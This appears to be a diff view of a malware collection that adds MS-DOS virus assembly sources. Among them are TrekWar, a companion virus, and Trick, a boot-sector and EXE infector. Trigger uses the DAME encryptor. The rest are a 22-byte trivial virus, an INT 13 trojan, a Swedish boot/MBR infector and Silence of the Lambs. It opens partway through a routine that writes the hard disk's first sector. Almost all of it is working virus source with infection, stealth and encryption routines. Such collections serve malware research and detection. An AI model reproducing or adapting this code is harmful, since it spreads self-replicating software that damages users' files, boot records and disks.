push ax
push cs
mov ax,offset done
push ax
mov ax,100
push ax
push cs
mov ax,offset faddr
push ax
mov ah,55
iret
assume ds:nothing
faddr:
jmp oldintx
newint1:
push bp
mov bp,sp
cmp trace,0
jne search
exit:
and [bp+6],not 100
exit1:
pop bp
iret
search:
cmp [bp+4],CODEX
jb exit1
;Or use ja if you want to trace DOS-owned interrupt
push ax
mov ax,[bp+4]
mov word ptr newintx+2,ax
mov ax,[bp+2]
mov word ptr newintx,ax
pop ax
mov found,1
mov trace,0
jmp exit
assume ds:code
done:
mov trace,0
push ds
mov ax,word ptr oldint1+2
mov dx,word ptr oldint1
mov ds,ax
mov ax,2501 ; Restore old INT 1 handler
int 21
pop ds
; Code beyong this point is not sacred...
; It may be perverted in any manner by any pervert.
cmp found,1 ; See if original INT 13 handler found
jne quit ; Exit if not
push ds
pop es ; Restore ES
mov ax,301 ; Write 1 sector
mov cx,1 ; Cylinder 0, sector 1
mov dx,80 ; Head 0, drive 80h
mov bx,offset buffer
pushf ; Simulate INT 13
call newintx ; Do it
quit:
mov ax,4C00 ; Exit program
int 21
code ends
end start


185
MSDOS/Virus.MSDOS.Unknown.trekwar.asm Normal file
View File

@ -0,0 +1,185 @@
;TREKWAR virus - we were overjoyed at Crypt Newsletter when Goose showed
;us his update of CloneWar, TrekWar. Alert readers will remember ACME,
;the musical companion based on ZENO, a relative of CloneWar.
;So here it is!
;TrekWar
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ Assembly Source Listing for TrekWar Companion Virus ³
;³ Copyright (c) 1993 T.R.E.K. All Rights Reserved. :) ³
;ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
;³ The TrekWar is a simple modification of the Clonewar V2 companion virus; ³
;³ for all you trekkers out there... For those of you who, heaven forbid, do ³
;³ not know what the words below mean, they are the words to the old series ³
;³ opening music of Star Trek... ³
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
CSEG SEGMENT
ASSUME CS:CSEG,DS:NOTHING
ORG 100H
START:
jmp VIR_BEGIN ;lets get moving...
db "",13,10
db "",13,10
db "Beyond",13,10 ;blah blah blah
db "The rim of the star-light",13,10
db "My love",13,10
db "Is wand'ring in star-flight",13,10
db "I know",13,10
db "He'll find in star-clustered reaches",13,10
db "Love",13,10
db "Strange love a star woman teaches.",13,10
db "I know",13,10
db "His journey ends never",13,10
db "His star trek",13,10
db "Will go on forever.",13,10
db "But tell him",13,10
db "While he wanders his starry sea",13,10
db "Remember, remember me."
db "",13,10
db "",13,10
db "[TrekWar] " ;what the heck, its only a few bytes!?
WILDCARD DB "*.EXE",0
FILE_EXT DB "COM",0
FILE_FOUND DB 12 DUP(' '), 0
FILE_CREATE DB 12 DUP(' '), 0
SEARCH_ATTRIB DW 17H
NUM_INFECT DW 0
My_Cmd:
CMD_LEN DB 13
FILE_CLONE DB 12 DUP (' '), 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Read all the directory filenames and store as records in buffer.
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Vir_begin:
mov sp,offset STACK_HERE ;move stack down
mov bx,sp
add bx,15
mov cl,4
shr bx,cl
mov ah,4ah ;deallocate rest of memory
int 21h
mov di,OFFSET FILE_CLONE ;Point to buffer.
mov si,OFFSET FILE_FOUND
mov cx,12
rep movsb
Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search
mov cx,SEARCH_ATTRIB
mov ah,4Eh ;find first matching file
int 21h
jc EXIT ;If empty directory, exit
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Store_name:
mov di,OFFSET FILE_FOUND ;Point to buffer.
mov si,158 ;stow the file found in buffer
mov cx,12
rep movsb
mov di,OFFSET FILE_CREATE ;Point to buffer.
mov si,158
mov cx,12
rep movsb
cld
mov di,OFFSET FILE_CREATE
mov al,'.'
mov cx,9
repne scasb ;find the '.'
mov si,OFFSET FILE_EXT
mov cx,3
rep movsb ;replace the .EXE with .COM
;from buffer
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Check_file: ;does the file exist?
mov dx,OFFSET FILE_CREATE
xor cx,cx
mov ax,3d00h ;Open file, read only
int 21h
jnc find_next
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Infect_file: ;create companion routine
mov dx,OFFSET FILE_CREATE ;contains name of "companion"
xor cx,cx
mov ah,3ch ;construct file
int 21h
jc EXIT
;Write virus to companion file
xchg bx,ax
mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length
mov dx,OFFSET START
mov ah,40h ;write to file function
int 21h ;do it
;Close file
mov ah,3eh ;assumes bx still has file handle
int 21h
;Change attributes
mov dx,OFFSET FILE_CREATE ;of created file to
mov cx,3 ;(1) read only and (2) hidden
mov ax,4301h
int 21h
jmp prepare_command
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;...findnext...
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
find_next:
mov ah, 4fh ;find next...
int 21h
jmp store_name
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Prepare_command:
cld
mov di,OFFSET FILE_CLONE
mov al,0
mov cx,12
repne scasb ;find the end of string \0
mov al,0Dh ;<CR>
stosb ;replace \0 with a <CR>
mov ax,12 ;store length of the command
sub ax,cx
mov CMD_LEN, al
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Exit:
;Run the original program
mov si, OFFSET MY_CMD
int 2Eh ;Pass command to command
;interpreter for execution
mov ax,4C00H ;Exit to DOS
int 21h
END_OF_CODE = $
STACK_HERE EQU END_OF_CODE + 512
CSEG ENDS
END START

2266
MSDOS/Virus.MSDOS.Unknown.tremor.asm Normal file
View File

File diff suppressed because it is too large Load Diff

255
MSDOS/Virus.MSDOS.Unknown.trick446.asm Normal file
View File

@ -0,0 +1,255 @@
; Trick Virii (446 bytes length!)
; (l) 1997 copyleft by Psychomancer // SPS.
; 2:454/7.64@FidoNet
; MBR/BOOT/EXE stealth hard-removable infector.
; Thanx 2 Nutcracker 4 "cryp_sec" algorithm.
; WARNING! 4 compile tasm /m option needed!
; DON'T RUN IT! ONLY 4 DEMONSTRATION!
model tiny
.code
begin: mov cx,decryp_len
call $+3
xor ah,ah
int 15h ; antiheuristic trick (must b CF=1 on return)
pop si
sbb al,al ; <- set AL in zero manual on 1st execute!
; (in DEBUG)
lea di,[si+decryp_begin-6]
xor_decryp: sub al,0
xor_mask equ $-begin-1
xor cs:[di],al ; decrypt selfbody
inc di
loop xor_decryp
decryp_begin equ $-begin
decryp_code: sub si,6
jz file_start ; goto if run from file
mov bx,7c00h
xor di,di
mov ds,di
mov ss,di
mov sp,bx
dec word ptr ds:[413h] ; decrease TOM
mov ax,[di+3*4]
mov [si+rom_mask],ax ; store crypt mask
int 12h
mov cx,206h
mov [si+offrand],ch ; set in 2
shl ax,cl
mov es,ax
push ss bx
rep movsb ; move selfbody 2 new segm
push es
mov es,cx
mov cl,go_after_move
push cx
retf
;-----------------------------------------------;
file_start: mov ax,0deadh
int 13h ; we present in memory?
jnc file_exit
mov ah,13h
int 2fh
mov ax,259ah
int 21h ; set int 9ah on ROM int 13h
mov ah,13h
int 2fh
push cs
pop es
mov ax,1600h
int 2fh
cmp ax,1600h ; we execute under windoze?
mov al,0
org $-1
jnc $ ; no - will b crypt direntries
org $-1
je no_win_run
mov al,0
org $-1
jmp $ ; yeah - no crypt direntries
org $-1
no_win_run: mov cs:cryp_switch,al ; store it
lea bx,buffer
call copy_2_mbr ; infect mbr on 1st hd
file_exit: .exit
;-----------------------------------------------;
go_after_move equ $-begin
mov si,13h*4
mov di,9ah*4
movsw ; set int 9ah on ROM int 13h
movsw
mov word ptr [si-4],offset int_13h_entry ; hook int 13h
mov [si-2],ax
cmp byte ptr [bx],0ebh ; we loading from floppy boot?
jne load_from_mbr
call copy_2_mbr ; yeah - infect mbr on 1st hd
load_from_mbr: mov cl,11h ; read original mbr code
read_sec: mov dx,80h
mov ax,201h
int 9ah
retf ; exit
;-----------------------------------------------;
int_13h_entry: mov cs:store_fn,ah
mov cs:store_sc,al
cmp ax,0deadh ; our function?
je exit_13h_retf
int 9ah ; call old int 13h
pushf
push ax si di ds dx cx es
pop ds
jc exit_13h ; exit if error
mov ax,0
store_fn = byte ptr $-2
cmp dl,80h ; non-1st hd?
je hd_access
cmp al,3 ; write?
jne exit_13h
cmp dx,cx ; floppy?
ja no_boot_write
dec cx ; boot?
jnz no_boot_write
mov word ptr [bx],3eebh ; yeah - infect floppy boot
jmp copy_2_boot
no_boot_write: mov ax,[bx]
not ax
mul ah
sub ax,72bah ; 'MZ' or 'ZM' in buffer?
jnz exit_13h
int 1ah ; get timer tick
mov cl,0 ; randomize
offrand equ $-begin-1
xchg dx,ax
cwd
idiv cx ; get random
and dx,dx
jnz exit_13h
mov [bx+6],dx ; set number of relocation on zero
mov word ptr [bx+8],4 ; length of header
mov [bx+14h],dx ; set cs:ip on zero (i.e. on trick ;)
mov [bx+16h],dx
rol byte ptr cs:offrand,1 ; change randomize
copy_2_boot: lea di,[bx+40h]
call crypt_self ; self encrypt and move 2 buffer
pop cx dx
call write_sec ; write sector on disk
jmp exit_13h_pop
hd_access: cmp al,2 ; read?
jne no_stealth
and dh,dh ; head is zero?
jnz hd_read
dec cx ; cyl/sec is 0/1?
jnz hd_read
mov cl,11h
push cs
call read_sec ; read original mbr
exit_13h: pop cx dx
exit_13h_pop: pop ds di si ax
popf
exit_13h_retf: retf 2 ; exit from int 13h
no_stealth: cmp al,3 ; write?
jne exit_13h
hd_read: mov cs:cryp_or_decryp,0 ; set "js"
org $-1
js $
org $-1
call crypt_sec ; encrypt direntries in buffer
cryp_switch label byte
jnc decrypt_sec ; goto if direntries is not found
pop cx ; restore cyl/sec
push cx
mov ah,3
int 9ah ; re-write crypted direntries
decrypt_sec: lea ax,exit_13h ; decrypt direntries in buffer
push ax
;-----------------------------------------------;
crypt_sec: mov cx,0 ; number of sector
store_sc = byte ptr $-2
push cx
mov si,bx
scan_next_sec: push cx
mov cl,10h ; number of direntries on one sector
scan_next_elem: push cx si
mov cl,0bh
next_char_name: lodsb
cmp al,' ' ; check if filename
jb get_next_elem
loop next_char_name
lodsb
test al,11001000b ; check if attribute
jnz get_next_elem
mov cl,9
next_char_res: lodsb
and al,al ; check if normal (not long!) filename
jnz get_next_elem
loop next_char_res
test [si],dl ; already en/decrypted?
cryp_or_decryp label byte
js get_next_elem
xor [si],dl ; en/decrypt direntry
mov ax,0 ; mask of crypt
rom_mask equ $-begin-2
sub ax,[si+1]
xor [si+5],ax
mov ah,1 ; set bit
get_next_elem: pop si cx
add si,20h ; get next direntry
loop scan_next_elem
pop cx ; get next sector
loop scan_next_sec
inc cs:cryp_or_decryp ; change condition
sahf ; store bit on cf
pop ax
retn
;-----------------------------------------------;
crypt_self: push cs
pop ds
xor si,si
in al,40h ; get random mask
mov [si+xor_mask],al
mov cl,decryp_begin
rep movsb ; move unencrypted part
mov ah,-1
mov cx,decryp_len
xor_encryp: sub ah,al
movsb
xor es:[di-1],ah
loop xor_encryp ; move and encrypt selfbody
retn
;-----------------------------------------------;
copy_2_mbr: mov cx,1
push cs
call read_sec ; read mbr on 1st hd
cmp byte ptr es:[bx],0 ; already infected?
org $-1
mov cx,0
org $-2
je already_prs
mov cl,11h
call write_sec ; store original mbr in 0/0/17
mov di,bx
call crypt_self ; move and encrypt selfbody
inc cx ; cx=1
write_sec: mov ax,301h
int 9ah ; infect mbr
already_prs: retn
decryp_len equ $-decryp_code
len_body equ $-begin
buffer label byte
end begin

500
MSDOS/Virus.MSDOS.Unknown.trigger.asm Normal file
View File

@ -0,0 +1,500 @@
.model tiny
.code
.radix 16
org 0
viruslength = (heap - entry)
virussizeK = (endvirus - entry + 3ff) / 400
virussizepara = (virussizeK)*40
EXE_ID = 'PS'
entry:
call past
next:
db 0,"Trigger by Dark Angel of Phalcon/Skism",0Dh,0A
db "Utilising Dark Angel's Multiple Encryptor (DAME)",0Dh,0A
db 0Dh,0A,0
checkstub db 72,0FA,0E,1F,0BA,00,0B8,0B8,40,00,8E,0C0,26,81,3E,63
past: cld
pop bp
mov ax,0cf0
mov bx,'DA'
int 21
cmp bx,'GH'
jnz no_trigger
trigger:
push ds
push es
push cs
pop ds
xor ax,ax
checkagain:
lea si,[bp+checkstub-next]
mov es,ax
xor di,di
mov cx,8
rep cmpsw
jz trigger_it
inc ax
cmp ax,0a000
jb checkagain
jmp exit_trigger
trigger_it:
mov [bp+patch-next],ax
mov ds,ax
mov byte ptr ds:73,0cbh
push bp
mov bp,-80
jmp short $+2
db 09a ; call far ptr
dw 1
patch dw ?
pop bp
mov byte ptr ds:73,1f
exit_trigger:
pop es
pop ds
jmp short restore
no_trigger:
mov ax,4b90
int 21
cmp ax,bx
jz restore
push ds
push es
mov ax,ds
dec ax
mov ds,ax
sub word ptr ds:3,virussizepara
sub word ptr ds:12,virussizepara
mov es,ds:12
push cs
pop ds
xor di,di
lea si,[bp+offset entry-offset next]
mov cx,(viruslength + 1)/2
rep movsw
xor ax,ax
mov ds,ax
sub word ptr ds:413,virussizeK
mov di,offset oldint21
mov si,21*4
movsw
movsw
cli
pushf
pushf
pop ax
or ah,1
push ax
mov ds:1*4+2,es
mov word ptr ds:1*4,offset int1_1
popf
mov ah,30
pushf
call dword ptr ds:21*4
popf
lds si,dword ptr es:oldint21
mov di,si
lodsw
mov word ptr es:int21patch1,ax
lodsw
mov word ptr es:int21patch2,ax
lodsb
mov byte ptr es:int21patch3,al
push ds ; es:di->int 21 handler
push es
pop ds ; ds->high segment
pop es
mov al,0ea
stosb
mov ax,offset int21
stosw
mov ax,ds
stosw
sti
pop es
pop ds
restore:
cmp sp,-2
jnz restoreEXE
restoreCOM:
lea si,[bp+readbuffer-next]
mov di,100
push di
movsw
movsw
ret
restoreEXE:
mov ax,ds
add ax,10
add cs:[bp+readbuffer+16-next], ax
add ax,cs:[bp+readbuffer+0e-next]
mov ss,ax
mov sp,cs:[bp+readbuffer+10-next]
jmp dword ptr cs:[bp+readbuffer+14-next]
readbuffer dw 20cdh
dw 0bh dup (?)
int1_1:
push bp
mov bp,sp
push ax
mov ax, [bp+4] ; get segment
cmp ax, cs:oldint21+2
jae exitint1
mov cs:oldint21+2,ax
mov ax, [bp+2]
mov cs:oldint21,ax
exitint1:
pop ax
pop bp
iret
int1_2:
push bp
mov bp,sp
push ax
mov ax,cs
cmp ax,[bp+4]
jz exitint1
mov ax,[bp+4]
cmp ax,cs:oldint21+2
jnz int1_2_restore
mov ax,[bp+2]
cmp ax,cs:oldint21
jb int1_2_restore
sub ax,5
cmp ax,cs:oldint21
jbe exitint1
int1_2_restore:
push es
push di
cld
les di,dword ptr cs:oldint21
mov al,0ea
stosb
mov ax,offset int21
stosw
mov ax,cs
stosw
pop di
pop es
and [bp+6],0feff
jmp exitint1
install:
mov bx,ax
iret
int21:
cmp ax,4b90
jz install
push ds
push di
lds di,dword ptr cs:oldint21
mov word ptr ds:[di],1234
int21patch1 = $ - 2
mov word ptr ds:[di+2],1234
int21patch2 = $ - 2
mov byte ptr ds:[di+4],12
int21patch3 = $ - 1
pop di
pop ds
cld
cmp ax,4b00
jz infect
exitint21:
push ds
push ax
xor ax,ax
mov ds,ax
cli
mov word ptr ds:1*4,offset int1_2
mov ds:1*4+2,cs
sti
pushf
pop ax
or ah,1
push ax
popf
pop ax
pop ds
db 0ea
oldint21 dw 0, 0
callint21:
pushf
call dword ptr cs:oldint21
ret
already_infected:
pop dx
pop cx
mov ax,5701
call callint21
mov ah,3e
call callint21
exitnoclose:
mov ax,4301
pop dx
pop ds
pop cx
call callint21
exitinfect:
pop es
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
jmp exitint21
infect:
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
mov ax,4300
call callint21
push cx
push ds
push dx
mov ax,4301
xor cx,cx
call callint21
mov ax,3d02
call callint21
jc exitnoclose
xchg ax,bx
mov ax,5700
int 21
push cx
push dx
mov ah,3f
mov cx,18
push cs
pop ds
push cs
pop es
mov dx,offset readbuffer
mov si,dx
call callint21
jc already_infected
mov di,offset writebuffer
mov cx,18/2
push si
push di
rep movsw
pop di
pop si
mov ax,4202
xor cx,cx
cwd
int 21
cmp word ptr [di],'ZM'
jnz infectCOM
infectEXE:
cmp readbuffer+10,EXE_ID
go_already_infected:
jz already_infected
mov ds:writebuffer+4,ax
mov ds:writebuffer+2,dx
mov cx,10
div cx
sub ax,ds:writebuffer+8
mov ds:writebuffer+14,dx
mov ds:writebuffer+16,ax
xchg cx,dx
mov ds:writebuffer+0e,ax
mov ds:writebuffer+10,EXE_ID
mov al,10b
jmp finishinfect
infectCOM: ; si = readbuffer, di = writebuffer
push ax
mov cx,4
xor dx,dx
check_infection_loop:
lodsb
add dl,al
loop check_infection_loop
pop ax
or dl,dl
jz go_already_infected
mov dx,18
cmp ax,dx
jnb no_fixup_com
mov ax,4200
xor cx,cx
int 21
no_fixup_com:
mov cx,ax
inc ch ; add cx,100
sub ax,3
push ax
mov al,0e9
stosb
pop ax
stosw
add al,ah
add al,0e9
neg al
stosb
mov al,11b
finishinfect:
cbw
; ax = bitmask
; bx = start decrypt in carrier file
; cx = encrypt length
; dx = start encrypt in virus
; si = buffer to put decryption routine
; di = buffer to put encryption routine
push bx
xchg cx,bx
xor si,si
mov di,offset copyvirus
mov cx,(heap-entry+1)/2
rep movsw
push ax
call rnd_init_seed
pop ax
mov dx,offset copyvirus
mov cx,viruslength
mov si,offset _decryptbuffer
mov di,offset _encryptbuffer
call dame
push cx
cmp ds:writebuffer,'ZM'
jnz no_fix_header
mov dx,ds:writebuffer+2
mov ax,ds:writebuffer+4
add cx,viruslength
add ax,cx
adc dx,0
mov cx,200
div cx
or dx,dx
jz nohiccup
inc ax
nohiccup:
mov ds:writebuffer+4,ax
mov ds:writebuffer+2,dx
no_fix_header:
call di
pop cx
pop bx
mov ah,40
mov dx,offset _decryptbuffer
call callint21
mov ah,40
mov cx,viruslength
mov dx,offset copyvirus
call callint21
mov ax,4200
xor cx,cx
cwd
int 21
mov ah,40
mov cx,18
mov dx,offset writebuffer
call callint21
jmp already_infected
vars = 0
include dame.asm
heap:
vars = 1
include dame.asm
writebuffer dw 0c dup (?)
_encryptbuffer: db 80 dup (?)
_decryptbuffer: db 180 dup (?)
copyvirus db viruslength dup (?)
db 20 dup (?)
endvirus:
end entry

17
MSDOS/Virus.MSDOS.Unknown.triv22.asm Normal file
View File

@ -0,0 +1,17 @@
;22 Byte Trivial Virus
;Use WASM to assemble
org 100h
db '*.*',0
mov ah,4eh
Again
mov dx,si
int 21h
mov ah,3ch
mov dx,9eh
int 21h
xchg bx,ax
mov ah,40h
jmps Again

69
MSDOS/Virus.MSDOS.Unknown.trojan.asm Normal file
View File

@ -0,0 +1,69 @@
;*****************************************************************************
; The High Evolutionary's INT 13 Trojan
;*****************************************************************************
;
; Development Notes:
; (Dec.1O.9O)
;
; Well, I was screwing around with TSR's the other day and I got the idea,
; "Hmm. I wonder what would happen if you negated INT 13..." This trojan/TSR
; program answers my query.
;
; It's really a big mess. You can't access any file on the directory, you can't
; DIR anything, can't TYPE anything, I think the only thing you can do is
; DEL which is handled by INT 21.
;
; Well, in any event, put this routine in any nifty source code you see and
; then compile it... It will confuse the fuck out of any 100% "Lame" user.
;
; Have fun...
;
; -= The High Evolutionary =-
;
;*****************************************************************************
; Copyright (C) 199O by The RABID Nat'nl Development Corp.
;*****************************************************************************
code segment
assume cs:code,ds:code
org 100h
start: jmp init_vectors
mesg db 'INT 13 Trojan by The High Evolutionary'
crud db '(C) 199O by RABID Nat''nl Development Corp.'
crap dd ?
program proc far
assume cs:code,ds:nothing
mov ax,4c00h ; Terminate Program with exit code 00
int 21h ; Call DOS
program endp
;
; The TSR initialization shit happens here...
;
init_vectors proc near
assume cs:code,ds:code
mov ah,35h ; ask for int vector
mov al,13h ; intercept INT 13
int 21h ; Call DOS
mov word ptr crap,bx
mov word ptr crap[2],es
mov ah,25h ; set int value
mov al,13h ; set for INT 13
mov dx,offset program ; Tell the TSR what to do when accessed
int 21h ; Call DOS
mov dx,offset init_vectors ; Load in this segment into DX
int 27h ; Make the sucker in DX TSR...
init_vectors endp
code ends
end start

260
MSDOS/Virus.MSDOS.Unknown.tsd1.asm Normal file
View File

@ -0,0 +1,260 @@
; Senast „ndrad 891213.
;
; L„gger gamla bootsectorn p† sida 1, sp†r 0, sector 3.
; sida 0, sp†r 0, sector 7 p† HD.
Code Segment
Assume cs:Code
Org 0000h
Main Proc Far
db 0EAh,05h,00h,0C0h,07h
jmp Near Ptr Init ; Hoppa f”rbi variabler och nya int13h
; Variabler
Old13h dd 0 ; Gamla vectorn till diskfunktionerna.
TmpVec dd 0 ; Tempor„r vec. vid „ndring av int 13.
BootPek dw 0003h,0100h
; Slut p† variabler
Int13h Proc Near
push ds
push ax
push bx
cmp dl,00h ; Drive A
jne Exit
cmp ah,02h
jb Exit
cmp ah,04h
ja Exit ; Kolla s† att func. 2-4
sub ax,ax
mov ds,ax
mov bx,043Fh ; Motor status byte.
test Byte Ptr [bx],01h ; Testa om motorn i A: „r p†..
jnz Exit ; Nej,hoppa till gamla int 13h
call Smitta
Exit: pop bx
pop ax
pop ds
jmp [Old13h]
Smitta Proc Near
push cx
push dx
push si
push di
push es
push cs
pop es
push cs
pop ds
mov si,0004h ; Max antal f”rs”k.
Retry: mov ax,0201h ; L„s en sector
mov bx,0200h ; L„s hit.
mov cx,0001h ; Sp†r 0 Sector 1
sub dx,dx ; Sida 0 Drive 0
pushf
call [Old13h] ; L„s in booten.
jnc OK
dec si
jz Slut ; Hoppa ur om fel.
jmp Retry ; F”rs”k max 4 g†nger.
OK: mov si,0200h
sub di,di
cld
lodsw
cmp ax,[di]
jne L2
lodsw
cmp ax,[di+2]
jne L2
jmp Slut
L2: mov ax,0301h ; Skriv en sector.
mov bx,0200h
mov cx,0003h ; Sp†r 0 Sector 3
mov dx,0100h ; Sida 1 Drive 0
pushf
call [Old13h] ; Flytta boot sectorn.
mov ax,0301h
sub bx,bx
mov cx,0001h
sub dx,dx
pushf
call [Old13h] ; Skriv ner viruset till booten.
Slut: pop es
pop di
pop si
pop dx
pop cx
ret
Smitta Endp
Int13h Endp
Init: sub ax,ax
mov ds,ax ; Nollar ds f”r att „ndra vect.
cli
mov ss,ax
mov sp,7C00h
sti ; S„tter upp en ny stack.
push cs
pop es
mov di,Offset Old13h
mov si,004Ch
mov cx,0004h
cld
rep movsb ; Flytta int 13h vectorn.
mov bx,0413h
mov ax,[bx] ; Minnesstorleken till ax.
dec ax
dec ax
mov [bx],ax ; Reservera plats f”r viruset.
mov cl,06h
shl ax,cl
mov es,ax ; Omvandla till segment addres.
mov Word Ptr TmpVec,Offset Int13h
mov Word Ptr TmpVec+2,es
push es
sub ax,ax
mov es,ax
push cs
pop ds
mov si,Offset TmpVec
mov di,004Ch
mov cx,0004h
rep movsb
pop es
sub si,si
mov di,si
mov cx,0200h ; Hela viruset + lite till.
rep movsb
mov ax,Offset Here
push es
push ax
ret ; Hoppa till viruset.
Here: sub ax,ax
int 13h ; <20>terst„ll driven
sub ax,ax
mov es,ax
mov ax,0201h ; L„s en sector funk.
mov bx,7C00h ; Hit laddas booten normalt.
mov cx,BootPek
mov dx,BootPek+2
int 13h
push cs
pop es
mov ax,0201h
mov bx,0200h
mov cx,0001h
mov dx,0080h
int 13h ; L„s in partions tabellen.
jc Over
push cs
pop ds
mov si,0200h
sub di,di
lodsw
cmp ax,[di] ; Kolla om den „r smittad.
jne HdInf
lodsw
cmp ax,[di+2]
jne HdInf
Over: mov BootPek,0003h
mov BootPek+2,0100h
sub bx,bx
push bx
mov bx,7C00h
push bx
ret ; K”r den gamla booten.
HdInf: mov BootPek,0007h
mov BootPek+2,0080h
mov ax,0301h
mov bx,0200h
mov cx,0007h
mov dx,0080h
int 13h ; Flytta orgin. part.tabellen.
jc Over
push cs
pop ds
push cs
pop es
mov si,03BEh
mov di,01BEh
mov cx,0042h
cld
rep movsb ; Kopiera part. data till viruset.
mov ax,0301h
sub bx,bx
mov cx,0001h
mov dx,0080h
int 13h ; Skriv viruset till part. tabellen.
sub ax,ax
mov es,ax ; Kolla om msg:et ska skrivas ut.
test Byte Ptr es:[046Ch],07h
jnz HdInf1
mov si,Offset Txt ; Detta utf”rs bara om man bootar fr†n
cld ; diskett.
Foo1: lodsb
cmp al,00h
je HdInf1
mov ah,0Eh
sub bx,bx
int 10h
jmp Foo1
HdInf1: jmp Over
Slutet Label Byte ; Anv„nds f”r att veta var slutet „r.
Txt db 07h,0Ah,0Dh,'The Swedish Disaster I',0Ah,0Dh,00h
Main Endp
Code Ends
End


166
MSDOS/Virus.MSDOS.Unknown.tsotl-a.asm Normal file
View File

@ -0,0 +1,166 @@
; Silence of The Lambs v1.0
; (c) The Chronomancer of Demoralized Youth 1992
;
; First version : Thursday 27th of Febuary - 01:50 CET.
;
org 100h
jmp short dummy1
db 'DY'
dummy1:
mov cx,(100h-80h)/2 ;save command line on stack
mov si,80h
save_parm:
push [si]
inc si
inc si
loop save_parm
mov ah,4Eh
xor cx,cx
mov dx,offset file
int 21h
jc nomore
again:
cmp byte [9Eh],0FAh
jae more
call infect
more:
mov ah,4Fh
int 21h
jnc again
nomore:
mov cx,(100h-80h)/2
mov si,0FEh
rest_parm:
pop [si]
dec si
dec si
loop rest_parm
mov bx,0000h
eof equ $-2
jmp bx
file db '*.COM',0
infect:
mov bx,cs
mov si,cs
dec si
mov ds,si
cmp byte[0],'Z'
je ok_mark
jmp back2
ok_mark:
sub word [0003h],pgfsize
jnc ok_mark2
jmp back
ok_mark2:
mov ax,[0012h]
sub ax,pgfsize
push ax
mov ds,bx
mov ax,4301h
xor cx,cx
mov dx,80h+1Eh
int 21h
mov ax,3D02h
int 21h
xchg bx,ax
pop ds
push ds
mov cx,total
xor dx,dx
mov ah,3Fh
int 21h
cmp byte [0],'M' ;exe ?
je close
cmp byte [0],'Z' ;exe ?
je close
cmp word [2],'YD' ;allready infected?
je close
xor cx,cx
xor dx,dx
push cx
push dx
mov ax,4202h
int 21h
add ax,total+100h
mov cs:word [00FEh],ax
mov ah,40h
mov cx,total
xor dx,dx
int 21h
push cs
pop ds
mov ah,40h
mov cx,applen
mov dx,offset append
int 21h
mov ax,4200h
pop dx
pop cx
int 21h
push [eof]
mov ax,word [00FEh]
mov [eof],ax
mov ah,40h
mov dx,100h
mov cx,total
int 21h
pop [eof]
close:
mov ah,3Eh
int 21h
back:
pop ds ;(mov ds,si)
add word [0003h],pgfsize
back2:
push cs
pop ds
ret
append:
call $+3
pop si
sub si,3+total
mov di,100h
mov cx,total
rep movsb
mov ax,100h
push ax
ret
applen equ $-offset append
total equ $-100h ;size
pgfsize equ ($-100h)/16+2 ;paragraphs needed


322
MSDOS/Virus.MSDOS.Unknown.tsotl-b.asm Normal file
View File

@ -0,0 +1,322 @@
; Silence of The Lambs v2.0
; (c) -=<: DRE/\MER :>=- of Demoralized Youth 1992
;
; THIS FILE IS FOR EDUCATION PURPOSES ONLY!
; PERMISSION IS GRANTED TO SPREAD THE SOURCE
; TO VIRUS WRITERS *ONLY*. PLEASE DO NOT MAKE
; ANY MODIFYCATIONS, UNLESS YOU ALSO INCLUDE
; THE ORIGINAL SOURCE.
;
; Assemble With A86
;
